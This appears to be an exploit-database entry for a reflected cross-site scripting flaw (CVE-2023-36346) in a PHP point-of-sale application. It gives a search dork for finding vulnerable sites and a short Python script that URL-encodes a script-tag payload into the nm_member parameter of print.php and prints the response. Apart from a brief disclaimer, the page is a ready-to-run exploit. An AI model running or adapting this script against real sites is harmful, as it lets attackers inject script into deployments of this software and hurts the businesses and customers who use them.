Sales of cashier goods v1.0 cross site scripting (xss) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-07-03 | Type : webapps | Platform : php
This exploit / vulnerability Sales of cashier goods v1.0 cross site scripting (xss) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
"nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)